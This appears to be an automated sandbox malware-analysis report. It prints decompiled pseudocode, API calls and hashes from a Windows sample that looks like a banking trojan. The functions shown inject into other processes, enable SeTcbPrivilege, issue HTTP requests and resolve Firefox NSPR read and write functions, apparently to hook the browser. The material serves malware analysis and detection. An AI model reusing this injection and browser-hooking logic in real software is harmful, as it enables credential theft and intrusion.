GetWindowInfo.USER32 ref: 0041A2DD
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0041A41A

Part of subcall function 00419C1A: WaitForSingleObject.KERNEL32(?,000000FF,745FA660,0041A053,00000000), ref: 00419C20
Part of subcall function 00419C1A: ReleaseMutex.KERNEL32(?), ref: 00419C54
Part of subcall function 00419C1A: IsWindow.USER32(?), ref: 00419C5B
Part of subcall function 00419C1A: PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75

Strings

, xrefs: 0041A1C1
@, xrefs: 0041A373
<, xrefs: 0041A2D6

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: aa7d3525540cd6d837ff885726de5086643cfdd6ca5da3331d089c2e17bc709a
Instruction ID: 84c5554d5f812be28c63def88804a43fbdd6eb83e7139ac29dc0136ed1327882
Opcode Fuzzy Hash: aa7d3525540cd6d837ff885726de5086643cfdd6ca5da3331d089c2e17bc709a
Instruction Fuzzy Hash: A891B370601308ABEB218EA9C889BFF7BB5AB41708F14405AF910A63D1C7BD8DD5D75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041932F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041932F(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0041CA33(__ecx, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E0041CB59();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E004154D1(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x424024, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E004116E9(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0041787A( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E00411CFE(_v20);
							E00411CFE(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E00418DC4(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E00412BCE(_t80, 1);
							_v12 = E00412BCE(_t80, 2);
							_t39 = E004130AD(_t80, E0041283B(_t80));
							_t72 = _v8;
							_t41 = E004130AD(_t72, E0041283B(_v8));
							_t70 = _v12;
							_push(E004130AD(_t70, E0041283B(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E004129F1(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x423b98, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E00411CCE(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E004154D1(_t69);
									goto L20;
								}
								 *_t78 = E0041215C(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E0041215C(_t53 | 0xffffffff, _v8);
								_t57 = E0041215C(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E00411CFE( *_t78);
									E00411CFE( *(_t78 + 4));
									E00411CFE( *(_t78 + 8));
									E00411CFE(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E00413733(0x80000, E00419084, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E00412BCE(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x424024, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0041932f
0x0041932f
0x0041933c
0x00419341
0x00419346
0x00419357
0x0041935d
0x00419362
0x00419364
0x00419522
0x00419525
0x0041952a
0x00000000
0x0041952a
0x00419375
0x0041937b
0x00419380
0x00000000
0x00000000
0x00419389
0x00419389
0x0041938e
0x00419391
0x00419393
0x00000000
0x00000000
0x004193a9
0x004193ab
0x004193ae
0x004193b0
0x004194f3
0x004194f6
0x004194fe
0x00000000
0x004194fe
0x004193b6
0x004193ba
0x004193bf
0x004193c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004193c7
0x004193c7
0x004193d0
0x004193de
0x004193e8
0x004193ed
0x004193f9
0x004193fe
0x0041940f
0x00419410
0x00419411
0x00419412
0x00419419
0x0041941a
0x0041941d
0x00419422
0x00419425
0x00419428
0x00000000
0x00000000
0x0041943e
0x00419440
0x00419442
0x00000000
0x00000000
0x00419448
0x0041944e
0x00419453
0x00419456
0x0041945c
0x0041945c
0x0041945c
0x0041945e
0x00419460
0x00419464
0x0041946a
0x0041946c
0x0041946e
0x004194da
0x004194db
0x00000000
0x004194db
0x0041947c
0x00419489
0x0041948f
0x00419494
0x00419497
0x0041949a
0x0041949d
0x004194bd
0x004194bf
0x004194c7
0x004194cf
0x004194d5
0x00000000
0x004194d5
0x0041949f
0x004194a3
0x00000000
0x00000000
0x004194a5
0x004194a7
0x00000000
0x00000000
0x004194b4
0x004194b9
0x004194bb
0x00000000
0x00000000
0x00000000
0x004194bb
0x004194e0
0x004194e9
0x004194eb
0x004194eb
0x00000000
0x00419503
0x0041950e
0x00419514
0x00419514
0x00000000
0x00419521
0x00000000

APIs

Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54

GetCurrentThread.KERNEL32 ref: 00419350
SetThreadPriority.KERNEL32(00000000), ref: 00419357
WaitForSingleObject.KERNEL32(0000EA60), ref: 00419375
CreateMutexW.KERNEL32(00423B98,00000001,?,20000000), ref: 00419438
GetLastError.KERNEL32 ref: 00419448
CloseHandle.KERNEL32(00000000), ref: 00419456

Strings

Global\%08X%08X%08X, xrefs: 00419412

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: b7bbfbf96a89bc281a88f294ddd5b2ddb05c781484545996120b4d1213df0c7e
Instruction ID: 83874d11d37f4ae7f4aa303aa47fbaf2d9867f93473b6131949264faa726d704
Opcode Fuzzy Hash: b7bbfbf96a89bc281a88f294ddd5b2ddb05c781484545996120b4d1213df0c7e
Instruction Fuzzy Hash: A941E470A00206B7DB217BB18E56BEF7B65AF00704F10062BF911F62A2DB7C8DD1869C

Uniqueness

Uniqueness Score: -1.00%

Function 00410C19, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410C19(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;

				_t58 = __ecx;
				_t66 =  &_v112;
				E00419897(0xdd, _t66);
				_t30 = LoadLibraryW(_t66);
				_v8 = _t30;
				if(_t30 == 0) {
					return _t30;
				}
				_t61 =  &_v84;
				E00419861(0xde, _t61);
				_t55 = GetProcAddress(_v8, _t61);
				_t62 =  &_v40;
				E00419861(0xdf, _t62);
				_v20 = GetProcAddress(_v8, _t62);
				_t63 =  &_v60;
				E00419861(0xe0, _t63);
				_t42 = GetProcAddress(_v8, _t63);
				_t68 = 0;
				_t64 = _t42;
				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
					L14:
					return FreeLibrary(_v8);
				} else {
					_t44 = E004133CA(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v24 = _t44;
					if(_t44 != 0xffffffff) {
						E00410BA8(_t58, 0, _t64, _t44, _a4, _a8);
					}
					_push( &_v12);
					_push( &_v16);
					_push(1);
					_push(_t68);
					_push(_t68);
					if( *_t55() == 0) {
						goto L14;
					} else {
						_t57 = 0;
						if(_v12 <= _t68) {
							L13:
							_v20(_v16);
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t59 = _t68 + _v16;
							_t50 =  *((intOrPtr*)(_t59 + 8));
							if(_t50 == 0 || _t50 == 4) {
								_t51 =  *_t59;
								if( *_t59 != _v24) {
									E00410BA8(_t59, _t68, _t64, _t51, _a4, _a8);
								}
							}
							_t57 = _t57 + 1;
							_t68 = _t68 + 0xc;
						} while (_t57 < _v12);
						goto L13;
					}
				}
			}

0x00410c19
0x00410c20
0x00410c28
0x00410c30
0x00410c36
0x00410c3b
0x00410d1e
0x00410d1e
0x00410c43
0x00410c4b
0x00410c5e
0x00410c60
0x00410c68
0x00410c75
0x00410c78
0x00410c80
0x00410c8b
0x00410c8d
0x00410c8f
0x00410c93
0x00410d11
0x00000000
0x00410c9e
0x00410ca3
0x00410ca8
0x00410cae
0x00410cb4
0x00410cbe
0x00410cbe
0x00410cc6
0x00410cca
0x00410ccb
0x00410ccd
0x00410cce
0x00410cd3
0x00000000
0x00410cd5
0x00410cd5
0x00410cda
0x00410d0b
0x00410d0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00410cdc
0x00410cdc
0x00410cdf
0x00410ce2
0x00410ce7
0x00410cee
0x00410cf3
0x00410cfd
0x00410cfd
0x00410cf3
0x00410d02
0x00410d03
0x00410d06
0x00000000
0x00410cdc
0x00410cd3

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?), ref: 00410C30
GetProcAddress.KERNEL32(?,?), ref: 00410C5C
GetProcAddress.KERNEL32(?,?), ref: 00410C73
GetProcAddress.KERNEL32(?,?), ref: 00410C8B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?,00000000), ref: 00410D14

Part of subcall function 004133CA: GetCurrentThread.KERNEL32 ref: 004133DA
Part of subcall function 004133CA: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
Part of subcall function 004133CA: OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00411567,?,?,00000000), ref: 00410CA8

Part of subcall function 00410BA8: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410BCD
Part of subcall function 00410BA8: CloseHandle.KERNEL32(?,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410C0E

Strings

.exe, xrefs: 00410C42
SeTcbPrivilege, xrefs: 00410C9E

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 853414da98359fbe984d31aadbd48b1eaee33cd3e46df1b87d0a014fbbd168fe
Instruction ID: a429aabe64849827bf616fa2e204ca9c9547a6ccc49a2f099ed329d3475f55bd
Opcode Fuzzy Hash: 853414da98359fbe984d31aadbd48b1eaee33cd3e46df1b87d0a014fbbd168fe
Instruction Fuzzy Hash: 32316A35A00118ABCB11ABE5EC819EEBB79FB44704F104567F805F6211CBB9AE81DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4D2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C4D2(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				void* __esi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x422b14);
				 *0x422b08 = 0;
				 *0x422b10 = 0;
				 *0x422b0c = 0;
				 *0x422b04 = 0;
				 *0x423a54 = 0;
				 *0x423a4c = 0;
				 *0x423a50 = 0;
				InitializeCriticalSection(0x423a34);
				_t42 =  &_v532;
				E0041CD51(_t39, _t42, InitializeCriticalSection, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0040E019( &_v532);
				E0040F268( &_v532);
				 *0x422bc4 = 0;
				 *0x422c44 = 0;
				InitializeCriticalSection(0x422c2c);
				E0040BC0D(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E00404F3F(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x422b44 =  *0x422b44 | 0x00000001;
				}
				E00404D08();
				return 1;
			}

0x0041c4d2
0x0041c4d2
0x0041c4e9
0x0041c4f4
0x0041c4fa
0x0041c500
0x0041c506
0x0041c50c
0x0041c512
0x0041c518
0x0041c51e
0x0041c521
0x0041c527
0x0041c52c
0x0041c53f
0x0041c54c
0x0041c551
0x0041c56b
0x0041c570
0x0041c570
0x0041c574
0x0041c574
0x0041c57a
0x0041c580
0x0041c586
0x0041c586
0x0041c58c
0x0041c59a
0x0041c5a5
0x0041c5af
0x0041c5b5
0x0041c5bb
0x0041c5bd
0x0041c5cf
0x0041c5da
0x0041c5d1
0x0041c5d3
0x0041c5d3
0x0041c5de
0x0041c5e0
0x0041c5e0
0x0041c5e7
0x0041c5f2

APIs

InitializeCriticalSection.KERNEL32(00422B14,00000000,0001FD30,00000000), ref: 0041C4E9
InitializeCriticalSection.KERNEL32(00423A34), ref: 0041C51E

Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0041C546
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0041C563
CloseHandle.KERNEL32(00000000), ref: 0041C574
InitializeCriticalSection.KERNEL32(00422C2C), ref: 0041C5BB
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041C5C7

Strings

nspr4.dll, xrefs: 0041C5C2

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: nspr4.dll
API String ID: 1155594396-741017701
Opcode ID: 0c3a9a7fea4c581c6b0194d9fb292b751286443763dcb38003b10c3aced20910
Instruction ID: 982fd6b60ce602c3c30e9fc7b33cce5870954f9b4528a442642a93ea236803c5
Opcode Fuzzy Hash: 0c3a9a7fea4c581c6b0194d9fb292b751286443763dcb38003b10c3aced20910
Instruction Fuzzy Hash: 8231B870680218BAC7209F75ADC5ADE7B79AB44314F50057FE415E32E0D7B86E868B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA6E, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041CA6E(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t26 = E00416662( *0x423b74, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x423b60 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x423b60 -  *0x423b74 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x423b74 -  *0x423b74 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C24F(0x424024, _t51, _v12,  *0x424024) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C24F(0x424028, _t51, _v12,  *0x424028) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x0041ca6e
0x0041ca6e
0x0041ca7a
0x0041ca81
0x0041ca86
0x0041ca9b
0x0041caa8
0x0041caaa
0x0041caaa
0x0041cab6
0x0041cab9
0x0041cadb
0x0041cadd
0x0041cadd
0x0041cafc
0x0041cafe
0x0041cafe
0x0041cb17
0x0041cb19
0x0041cb19
0x0041cb32
0x0041cb34
0x0041cb34
0x0041cb3a
0x0041cb51
0x0041cb3c
0x0041cb46
0x00000000
0x0041cb46
0x0041ca88
0x0041ca88
0x0041ca88
0x0041ca88
0x0041cb56

APIs

Part of subcall function 00416662: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0001FDA6,00000000), ref: 0041667E

DuplicateHandle.KERNEL32(000000FF,0001FDA6,00000000,0001FDA6,00000000,00000000,00000002,00000000,00000000,?,?,?,00406420,?,00000000,?), ref: 0041CAA0
WriteProcessMemory.KERNEL32(00000000,0001FDA6,?,00000004,00000000,?,?,?,?,00406420,?,00000000,?,?,004065AE,?), ref: 0041CAD7
WriteProcessMemory.KERNEL32(00000000,0001FDA6,0001FDA6,00000004,00000000,?,?,?,00406420,?,00000000,?,?,004065AE,?,?), ref: 0041CAF7
VirtualFreeEx.KERNEL32(00000000,0001FDA6,00000000,00008000,00000000,0001FDA6,00000000,0001FDA6,?,?,00406420,?,00000000,?,?,004065AE), ref: 0041CB46

Strings

$@B, xrefs: 0041CB07
t;B, xrefs: 0041CAE1
(@B, xrefs: 0041CB22
`;B, xrefs: 0041CAC1

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: $@B$(@B$`;B$t;B
API String ID: 2215616122-1652081232
Opcode ID: f4bf2983d3b859990060073e456e0cc5704b466467401160893b1654794f4ce4
Instruction ID: 1e28a60be84a6ed4d7c3db0c5e3e6b967f1e7c3883753404dd6c2c16a4d7e05f
Opcode Fuzzy Hash: f4bf2983d3b859990060073e456e0cc5704b466467401160893b1654794f4ce4
Instruction Fuzzy Hash: EB21D376A44109BBDF11CFA4ED81EEE7FBCEB49349F404095F701E2151D339AA868B28

Uniqueness

Uniqueness Score: -1.00%

Function 004139E6, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004139E6(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x004139ed
0x004139f1
0x004139f6
0x004139f8
0x004139f8
0x00413a01
0x00413a03
0x00413a03
0x00413a0c
0x00413a11
0x00413a13
0x00413a13
0x00413a34
0x00413a38
0x00413a98
0x00000000
0x00413a3a
0x00413a3c
0x00413a44
0x00413a46
0x00413a4b
0x00413a3e
0x00413a3e
0x00413a40
0x00413a5d
0x00413a91
0x00413a92
0x00000000
0x00413a5f
0x00413a5f
0x00413a73
0x00413a82
0x00000000
0x00413a8d
0x00000000
0x00413a8d
0x00413a82
0x00413a5d

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 00413A2E
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413A55
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00413A7A
InternetCloseHandle.WININET(00000000), ref: 00413A92

Strings

HTTP/1.1, xrefs: 00413A22
POST, xrefs: 00413A0C
GET, xrefs: 00413A13, 00413A2A
Connection: close, xrefs: 00413A46, 00413A53

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: ae44196c6d01a36f030997b89dc24ce9c3e681acfa86aa0eb077aef888ebbeb2
Instruction ID: a5d5345edb4993a02f14253f2e9f6523828b0bd5a589c32f1cc82a412600693f
Opcode Fuzzy Hash: ae44196c6d01a36f030997b89dc24ce9c3e681acfa86aa0eb077aef888ebbeb2
Instruction Fuzzy Hash: 9511843124020A7BEB118F54DC49FEB3E9CAF1479AF14402AFE41A51A0D7B8DB9087EC

Uniqueness

Uniqueness Score: -1.00%

Function 00404F3F, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404F3F(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422370 = GetProcAddress(__edi, "PR_Close");
				 *0x422380 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422360);
				_t9 = 4;
				 *0x422390 = _t4;
				_t10 = E00404C77(_t9, _t11, _t12);
				if(_t10 != 0) {
					E0040F321(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
				}
				return _t10;
			}

0x00404f3f
0x00404f3f
0x00404f55
0x00404f62
0x00404f6f
0x00404f74
0x00404f76
0x00404f7d
0x00404f7e
0x00404f88
0x00404f8c
0x00404fa8
0x00404fa8
0x00404fb1

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404F4D
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404F5A
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404F67
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404F74

Part of subcall function 00404C77: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,00020016,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 00404CAE

Part of subcall function 0040F321: InitializeCriticalSection.KERNEL32(00422ADC,0001FD30,00404FAD,00422360), ref: 0040F337
Part of subcall function 0040F321: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F373
Part of subcall function 0040F321: GetProcAddress.KERNEL32(PR_SetError), ref: 0040F385
Part of subcall function 0040F321: GetProcAddress.KERNEL32(PR_GetError), ref: 0040F397

Strings

PR_Write, xrefs: 00404F69
PR_OpenTCPSocket, xrefs: 00404F47
PR_Close, xrefs: 00404F4F
PR_Read, xrefs: 00404F5C

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 6661ca2bf98ae48bc77b78431093f0cd8a9f11623b32d802b1f230e3566d1af7
Instruction ID: c4ed9ba6e8cad945acb82b6205de8cfd504f06e0059ca920e8a215ddb3174949
Opcode Fuzzy Hash: 6661ca2bf98ae48bc77b78431093f0cd8a9f11623b32d802b1f230e3566d1af7
Instruction Fuzzy Hash: C8F09071B813147BCB209B766D06D563FA8F746B64388043BB904A71B0C7FE0412DA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB10, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040FB10(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E0041CB59();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x422b00(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x422adc;
					EnterCriticalSection(0x422adc);
					_t101 = E0040EEAE(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x422af8;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4336332
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E00411D3A(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
